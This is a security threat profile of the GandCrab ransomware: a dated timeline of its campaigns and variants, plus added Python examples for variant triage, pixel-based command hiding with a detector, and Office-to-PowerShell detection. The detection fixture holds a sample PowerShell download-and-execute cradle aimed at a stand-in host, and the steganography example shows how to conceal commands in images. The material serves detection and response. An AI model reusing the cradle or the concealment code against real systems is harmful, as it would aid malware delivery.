GandCrab is currently distributed through the Seamless malvertising campaign, which attempts to install the ransomware via the RIG and GrandSoft exploit kits. This variant appends .GDCB to the names of encrypted files and skips any file whose path contains one of the following strings: \ProgramData\, \Program Files\, \Tor Browser\, Ransomware, \All Users\, \Local Settings\, desktop.ini, autorun.inf, ntuser.dat, iconcache.db, bootsect.bak, boot.ini, ntuser.dat.log, thumbs.db, GDCB-DECRYPT.txt, .sql. For its Command and Control (C2) servers GandCrab uses several Namecoin .bit domains; these are registered on the Namecoin blockchain rather than in the ICANN DNS root, so they do not resolve through ordinary recursive DNS, and lookups for .bit names on a corporate network are worth logging or blocking.

GandCrab is the first documented ransomware to accept payment in DASH cryptocurrency. A ransom note named GDCB-DECRYPT.txt is dropped in multiple locations on the infected machine and demands 1.54 DASH (about $1,170 USD at the time). Victims are instructed to download the Tor Browser, or to use one of several listed Tor gateways, for further payment instructions.

2/8/2018: A malspam campaign is distributing GandCrab via malicious email attachments disguised as receipts. The infection chain begins when the user clicks a fake CAPTCHA field inside the PDF attachment, which downloads a Word document. If macros are enabled, the document's macro uses PowerShell to download and run GandCrab on the victim's machine.

2/28/2018: The EITest distribution campaign is now delivering GandCrab through the HoeflerText Font Update scam. On a compromised website the campaign scrambles the page text and displays an alert telling the user to install a font update to fix it. If the user clicks "Update", a file named Font_Update.exe is downloaded, and running it launches GandCrab on the victim's machine.

3/6/2018: MalwareHunterTeam detected GandCrab version 2 which utilizes two new hostnames for the Command and Control servers, appends .CRAB to the names of encrypted files, and creates a ransom note named CRAB-Decrypt.txt. Additional changes include the ability to contact the malware developers via the Tox instant messaging service and an updated TOR payment page.

5/4/2018: Researchers with Fortinet discovered a new version, GandCrab v3, which uses Visual Basic scripts to download the malware and changes the desktop wallpaper to a ransom note. Once files on an infected machine are encrypted, the malware forces a system reboot; however, a coding bug in the ransomware disrupts the reboot and prevents the Windows shell from fully loading on Windows 7. As a result, victims on Windows 7 are left with only the ransom note wallpaper and a link to download the Tor Browser. The reboot completes normally on affected Windows 10 and Windows 8.1 systems.

7/3/2018: GandCrab V4 appends .KRAB to the names of encrypted files, creates a ransom note named KRAB-DECRYPT.txt, uses the Salsa20 encryption algorithm, and directs victims to a new TOR payment site. This version of GandCrab is believed to be distributed via fraudulent software crack downloads. Currently, there is no free decryption tool available for GandCrab V4.   

8/20/2018: Trend Micro detected an email spam campaign attempting to deliver GandCrab v4.3 to users in South Korea. The emails reference an "e-commerce transaction" and abuse EGG (.egg) files, a compressed archive format widely used in South Korea.

9/25/2018: GandCrab V5 appends a random five character extension to encrypted files and creates both a text and HTML ransom note. According to security researcher nao_sec, the newest version of GandCrab is distributed via malvertising campaigns that redirect users to websites hosting the Fallout exploit kit.
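The version entries above (v1, v2/v3, v4 and v5) each tie a file extension and a ransom-note name to a variant, which is what an incident responder uses to identify the strain on a hit host. The following triage script is an added example, not code from the original page: the extension/note pairs are taken from the timeline, while the v5 rule is a heuristic of our own based only on the statement that v5 appends a random five-character extension (the page does not give v5's note names). The sample trees it scans are constructed in a temporary directory.

```python
"""Added example: triage a directory tree for GandCrab file artifacts.

Not code from the original page. The extension/ransom-note pairs come from
the timeline above; the v5 rule is a heuristic of our own, based only on the
statement that v5 appends a random five-character extension.
"""
import os
import shutil
import tempfile
from collections import Counter

# (label, appended extension, ransom-note file name), lower-cased for matching.
VARIANTS = [
    ("GandCrab v1",    ".gdcb", "gdcb-decrypt.txt"),
    ("GandCrab v2/v3", ".crab", "crab-decrypt.txt"),
    ("GandCrab v4",    ".krab", "krab-decrypt.txt"),
]
NOTE_NAMES = {note for _, _, note in VARIANTS}


def scan_tree(root):
    """Count file extensions under root and collect known ransom-note paths."""
    exts, notes = Counter(), []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lower = name.lower()
            if lower in NOTE_NAMES:
                notes.append(os.path.join(dirpath, name))
                continue
            ext = os.path.splitext(lower)[1]
            if ext:
                exts[ext] += 1
    return exts, notes


def guess_variant(exts, notes, min_hits=10):
    """Return (label, extension, count) or None if nothing matched."""
    found_notes = {os.path.basename(p).lower() for p in notes}
    for label, ext, note in VARIANTS:
        if note in found_notes or exts[ext]:
            return label, ext, exts[ext]
    if exts:
        ext, n = exts.most_common(1)[0]
        # Heuristic for v5: the dominant extension is exactly five alphanumeric
        # characters ('.' plus five) and appears at least min_hits times.
        if len(ext) == 6 and ext[1:].isalnum() and n >= min_hits:
            return "GandCrab v5 (heuristic)", ext, n
    return None


def triage(root):
    return guess_variant(*scan_tree(root))


def _constructed_tree(ext, note_name, count):
    """Build a throwaway tree of empty files; constructed sample data."""
    root = tempfile.mkdtemp(prefix="gandcrab_triage_")
    docs = os.path.join(root, "Documents")
    os.makedirs(docs)
    for i in range(count):
        open(os.path.join(docs, f"report{i}.docx{ext}"), "w").close()
    if note_name:
        open(os.path.join(docs, note_name), "w").close()
    return root


def demo():
    """Run triage over three constructed trees and return the verdicts."""
    cases = {
        "v4":    (".KRAB", "KRAB-DECRYPT.txt", 5),
        "v5":    (".kqzrt", None, 12),   # random-looking extension, no known note
        "clean": ("", None, 3),
    }
    results = {}
    for name, args in cases.items():
        root = _constructed_tree(*args)
        try:
            results[name] = triage(root)
        finally:
            shutil.rmtree(root)
    return results


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

The v5 heuristic will misfire on any host where an unusual five-letter extension dominates, so treat it as a prompt to look for the text and HTML ransom notes rather than as a verdict; the known-extension matches are reliable because the note name and extension are checked together.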

2/12/2019: A malicious spreadsheet builds a PowerShell command from the individual pixel values of a downloaded image of Mario from Super Mario Bros; when executed, the command downloads and installs GandCrab.
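To make the pixel trick concrete, here is an added example of hiding a command in image pixels and recovering it, plus a defender-side check. It is not code from the page and not the encoding the real Mario-image loader used, which the page does not describe; it assumes the simplest possible scheme (successive command bytes in the R, G and B channels, zero-terminated) and represents the image as a list of rows of (r, g, b) tuples so it runs without an imaging library. The sample command string is a constructed placeholder.

```python
"""Added example: hide a command in pixel bytes and pull it back out.

Not code from the page and not the scheme the real Mario-image loader used;
the page does not describe that encoding. Assumed here: successive command
bytes stored in the R, G and B channels, zero-terminated. The image is a
plain list of rows of (r, g, b) tuples so it runs without PIL.
"""
import string

# Constructed stand-in for the recovered command; the real one is not on the page.
SAMPLE_COMMAND = "powershell -nop -w hidden -c <next-stage>"


def embed_command(command, width=8):
    """Pack command bytes three per pixel, then pad rows to `width` pixels."""
    data = command.encode("ascii") + b"\x00"          # zero byte terminates
    data += b"\x00" * (-len(data) % 3)                # whole pixels only
    pixels = [tuple(data[i:i + 3]) for i in range(0, len(data), 3)]
    pixels += [(0, 0, 0)] * (-len(pixels) % width)    # fill the last row
    return [pixels[i:i + width] for i in range(0, len(pixels), width)]


def extract_command(image):
    """Read channel bytes in raster order until the first zero byte."""
    out = bytearray()
    for row in image:
        for pixel in row:
            for channel in pixel:
                if channel == 0:
                    return out.decode("latin-1")
                out.append(channel)
    return out.decode("latin-1")


def hides_powershell(image):
    """Defender-side check: does the byte stream decode to printable text
    that mentions PowerShell? Real photos fail the printable test quickly."""
    text = extract_command(image)
    return (bool(text)
            and all(c in string.printable for c in text)
            and "powershell" in text.lower())


# Constructed "ordinary" pixels: non-printable channel values, no hidden text.
NOISE_IMAGE = [[(200, 17, 90), (33, 0, 0)]]

if __name__ == "__main__":
    img = embed_command(SAMPLE_COMMAND)
    print(extract_command(img))
    print(hides_powershell(img), hides_powershell(NOISE_IMAGE))
```

The point for a defender is that the image itself is benign data; the only reliable place to catch this chain is the spreadsheet macro that fetches the image and the PowerShell it spawns, not the image download.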

2/21/2019: A new version of GandCrab, 5.2, has been released.

3/7/2019: The threat actors behind GandCrab are attempting to compromise larger targets for bigger profits by compromising entire corporate networks via remote access.

  • Bleeping Computer provides additional information on GandCrab here.

  • Malwarebytes Labs provides additional analysis here.

  • Bitdefender released a free decryption tool for GandCrab via the NoMoreRansom project here. Bitdefender also released an additional free decryption tool for GandCrab versions 1, 4, and 5 available here.

  • AhnLab released a vaccine app that prevents GandCrab V4.1.2 from encrypting a user's files. The app is available for download here and here.

  • Bitdefender released an additional free decryption tool for GandCrab that works against versions 5.0.4-5.1, which have been active since November 2018, available here.

3/21/2019: The threat actors use fear and a sense of urgency to get the target to open the attached "important" document, click Enable Content, and enable editing to view its contents; a malicious macro then runs and downloads the GandCrab installer.

  • Phishing emails use the subject line "Flu pandemic warning" and impersonate a Centers for Disease Control and Prevention (CDC) employee.

  • Fake DHL shipping notices were also identified using the same tactics.

4/23/2019: Threat actors are executing GandCrab via PowerShell and using standard toolsets to avoid detection.

5/7/2019: GandCrab has a new, more evasive infection chain: it starts with phishing emails carrying Office documents, uses a multi-stage fileless chain to drop the ransomware, and abuses binaries that bypass Windows AppLocker to fetch the ransomware payload from a legitimate online text-sharing service.
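The 2/8/2018, 3/21/2019, 4/23/2019 and 5/7/2019 entries all describe the same detectable seam: an Office application spawning a script host, and PowerShell pulling a payload from the internet. The following is an added example of that detection logic, not code from the page; the events are constructed dicts shaped loosely like Sysmon process-creation fields (ParentImage, Image, CommandLine), and the field names, process lists and regexes are this example's assumptions rather than anything the page states.

```python
"""Added example: flag the Office-to-PowerShell chain in process-creation logs.

Not code from the page. Events are constructed dicts shaped loosely like
Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the field names
and the regexes are this example's assumptions, not anything the page states.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}

# Download cradles, and the flags commonly used to hide a PowerShell window or
# pass an encoded command. Both are tuned for recall, so expect some noise.
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
HIDDEN_RE = re.compile(
    r"-(enc|encodedcommand)\b|-w(indowstyle)?\s+hidden|-nop\b|-noni",
    re.IGNORECASE,
)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names an event triggers (empty if none)."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if child == "powershell.exe" and CRADLE_RE.search(cmd):
        hits.append("powershell_download_cradle")
    if child == "powershell.exe" and HIDDEN_RE.search(cmd):
        hits.append("powershell_hidden_or_encoded")
    return hits


def detect(events):
    """Map event Id -> triggered rules, keeping only events that fired."""
    findings = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            findings[event["Id"]] = hits
    return findings


# Constructed sample events: one macro-to-PowerShell chain, one benign admin
# PowerShell, one Excel-spawned VBScript, one service-launched cmd.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": PS,
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/r')"},
    {"Id": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell Get-Process"},
    {"Id": 3, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\a\AppData\Local\Temp\inv.vbs"},
    {"Id": 4, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c whoami"},
]

if __name__ == "__main__":
    for event_id, rules in detect(SAMPLE_EVENTS).items():
        print(event_id, rules)
```

The parent-child rule is the durable one: it does not depend on which download cradle or text-sharing host the operators switch to next, and it fires regardless of whether the payload itself ever touches disk.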

6/1/2019: The creators of GandCrab have announced that they are shutting down their Ransomware-as-a-Service (RaaS) operation within the month and plan to delete all decryption keys, which would make recovery of encrypted files impossible without them.

6/21/2019: New free decryption tool now available for GandCrab versions 1, 4, and 5.0 through 5.2 here and here.

7/15/2019: The FBI released a FLASH that includes the master decryption keys for newer versions of GandCrab.
